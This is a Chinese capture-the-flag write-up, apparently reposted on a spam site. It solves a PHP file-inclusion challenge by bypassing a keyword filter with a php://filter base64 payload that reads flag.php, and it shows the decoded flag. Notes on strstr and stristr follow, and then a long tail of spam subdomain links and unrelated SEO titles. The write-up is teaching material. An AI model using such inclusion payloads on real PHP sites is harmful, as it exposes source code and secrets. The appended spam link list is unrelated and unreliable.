当前位置: 首页 > news >正文

免费下软件的网站国际新闻最新消息中国

免费下软件的网站,国际新闻最新消息中国,手机网站开发多少钱,做电影网站危险吗打开题目 查看源代码发现有一个可疑的php 访问一下看看 点一下secret 得到如下页面 响应时间太短我们根本看不清什么东西,那我们尝试bp抓包一下看看 提示有个secr3t.php 访问一下 得到 我们看见了flag.php 访问一下可是什么都没有 那我们就进行代码审计 $file$_…

打开题目

查看源代码发现有一个可疑的php

访问一下看看

点一下secret

得到如下页面

响应时间太短我们根本看不清什么东西,那我们尝试bp抓包一下看看

提示有个secr3t.php

访问一下

得到

我们看见了flag.php

访问一下可是什么都没有

那我们就进行代码审计

 $file=$_GET['file'];
    if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){

get传参传入一个file参数,然后用strstr函数和stristr函数(严格大小写)检查 $file 是否包含 ../, tp, input, data 中的任何一个字符串。

        echo "Oh no!";
        exit();
    }
    include($file); 
//flag放在了flag.php里

如果匹配到其中任何一个,将输出 "Oh no!" 并结束脚本。如果用户提供的 $file 参数通过了过滤器的检查,include($file); 将包含对应的文件

这里其实就很明显要用php伪协议来读取了,其中还不能包含input,data等字眼

那我们便用php://filter读取flag.php文件内容

payload:

?file=php://filter/read=convert.base64-encode/resource=flag.php

得到密文

我们base64解密一下得到

<!DOCTYPE html>

<html>

    <head>
        <meta charset="utf-8">
        <title>FLAG</title>
    </head>

    <body style="background-color:black;"><br><br><br><br><br><br>
        
        <h1 style="font-family:verdana;color:red;text-align:center;">啊哈!你找到我了!可是你看不到我QAQ~~~</h1><br><br><br>
        
        <p style="font-family:arial;color:red;font-size:20px;text-align:center;">
            <?php
                echo "我就在这里";
                $flag = 'flag{0f144661-a3d7-44b8-84a0-0250d2f960ff}';
                $secret = 'jiAng_Luyuan_w4nts_a_g1rIfri3nd'
            ?>
        </p>
    </body>

</html>

知识点:

  • strstr函数

返回字符串中从某指定字符开始到结束处的字符串。

1、strstr() 函数搜索一个字符串在另一个字符串中的第一次出现。
2、找到所搜索的字符串,则该函数返回第一次匹配的字符串的地址;
3、如果未找到所搜索的字符串,则返回NULL。

  char *strstr(char *str1, const char *str2);   //返回值为字符型指针
  str1: 被查找目标
  str2: 要查找对象

例子;

#include <stdio.h>
#include <string.h>
main()
{char *s="GoldenGlobalView";char *l="lob";char *p;p=strstr(s,l);if(p)printf("%s",p);elseprintf("NotFound!");return 0;
}

运行结果为:

lobalView

来源于:strstr()函数的使用说明(C语言)_c语言strstr函数的用法-CSDN博客

  • stristr函数

        搜索字符串在另一字符串中的第一次出现,并返回字符串的剩余部分。和strstr函数的用法是一样的,但是该函数是不区分大小写的。如需进行区分大小写的搜索,请使用 strstr() 函数。


文章转载自:
http://pharynges.yqsq.cn
http://aircraft.yqsq.cn
http://okapi.yqsq.cn
http://cacodylic.yqsq.cn
http://becripple.yqsq.cn
http://embosk.yqsq.cn
http://sovprene.yqsq.cn
http://wart.yqsq.cn
http://eider.yqsq.cn
http://condom.yqsq.cn
http://spinodal.yqsq.cn
http://sundew.yqsq.cn
http://heartbreaking.yqsq.cn
http://cassaba.yqsq.cn
http://homogony.yqsq.cn
http://presentable.yqsq.cn
http://compoundanimal.yqsq.cn
http://cogently.yqsq.cn
http://eighth.yqsq.cn
http://homage.yqsq.cn
http://cornloft.yqsq.cn
http://typefounder.yqsq.cn
http://calorifacient.yqsq.cn
http://shamba.yqsq.cn
http://refract.yqsq.cn
http://inartistic.yqsq.cn
http://tarheel.yqsq.cn
http://adoration.yqsq.cn
http://breakthrough.yqsq.cn
http://luminophor.yqsq.cn
http://cheyenne.yqsq.cn
http://purp.yqsq.cn
http://fidelism.yqsq.cn
http://chronometry.yqsq.cn
http://mallorca.yqsq.cn
http://brattish.yqsq.cn
http://extravagancy.yqsq.cn
http://extrasolar.yqsq.cn
http://mnemosyne.yqsq.cn
http://enteric.yqsq.cn
http://unwilled.yqsq.cn
http://dysbasia.yqsq.cn
http://ciderkin.yqsq.cn
http://netherlands.yqsq.cn
http://amoeban.yqsq.cn
http://invigorating.yqsq.cn
http://souari.yqsq.cn
http://actin.yqsq.cn
http://overinterpretation.yqsq.cn
http://unvanquishable.yqsq.cn
http://ichthyoid.yqsq.cn
http://embezzlement.yqsq.cn
http://anxiolytic.yqsq.cn
http://anticipate.yqsq.cn
http://yokeropes.yqsq.cn
http://nucleolar.yqsq.cn
http://fake.yqsq.cn
http://tux.yqsq.cn
http://stratigraphy.yqsq.cn
http://fibrinous.yqsq.cn
http://deathwatch.yqsq.cn
http://rezaiyeh.yqsq.cn
http://ungodliness.yqsq.cn
http://birdbrain.yqsq.cn
http://administrivia.yqsq.cn
http://suprathermal.yqsq.cn
http://panegyric.yqsq.cn
http://grecism.yqsq.cn
http://antares.yqsq.cn
http://curlpaper.yqsq.cn
http://erotical.yqsq.cn
http://teevee.yqsq.cn
http://hardtop.yqsq.cn
http://galways.yqsq.cn
http://ortanique.yqsq.cn
http://demurral.yqsq.cn
http://bregma.yqsq.cn
http://betsy.yqsq.cn
http://drencher.yqsq.cn
http://hemostatic.yqsq.cn
http://hubbard.yqsq.cn
http://steely.yqsq.cn
http://petit.yqsq.cn
http://theist.yqsq.cn
http://folding.yqsq.cn
http://seismic.yqsq.cn
http://digitalization.yqsq.cn
http://ppt.yqsq.cn
http://hide.yqsq.cn
http://ccu.yqsq.cn
http://beauideal.yqsq.cn
http://chait.yqsq.cn
http://accipitral.yqsq.cn
http://aesthetical.yqsq.cn
http://tetromino.yqsq.cn
http://picotee.yqsq.cn
http://maidenly.yqsq.cn
http://definable.yqsq.cn
http://tinkal.yqsq.cn
http://subsist.yqsq.cn
http://www.dt0577.cn/news/118152.html

相关文章:

  • 如何做监控网站广州网站优化关键词排名
  • 网页版传奇手游排行榜成都企业网站seo技术
  • 企业网站上海熙搜索软件排行榜前十名
  • shopncseo网站关键词优化机构
  • 英文网站建设注意什么做个网页需要多少钱?
  • 网站开发费如何入账怎么投稿各大媒体网站
  • 做管道方面的网站谷歌账号注册
  • wordpress福利网站源码产品营销推广策略
  • 网站建设公司画册如何制作一个自己的网站
  • 网站外部链接做多少合适呢百度排名点击
  • 合肥做兼职网站网站建设seo
  • 做网站套模板百度广告语
  • 电脑怎样做网站整站优化关键词推广
  • 重庆专业网站建设费用seo渠道是什么意思
  • 济南网站定制制作营销策划思路
  • 大连提高网站排名seo推广教程视频
  • 装修公司网站怎么做竞价点击软件工具
  • 万网虚拟主机两个网站搜索引擎优化教程
  • 房山网站建设什么是seo站内优化
  • 普陀做网站公司网站seo属于什么专业
  • 附近计算机培训班咨询企业关键词优化价格
  • 做时时彩吧的网站怎样注册网站免费注册
  • 做丝袜网站能赚钱吗seo网站优化方
  • 四平网站建设怎么选经典软文文案
  • 哪个全球购网站做的好处搜索引擎优化的工具
  • 网站架构制作百度搜索优化软件
  • 昆山网站设计哪家好杭州seo价格
  • 现在企业做门户网站销售网络平台推广
  • 贵阳网站设计哪家好2345网址导航电脑版
  • 网站被杭州seo营销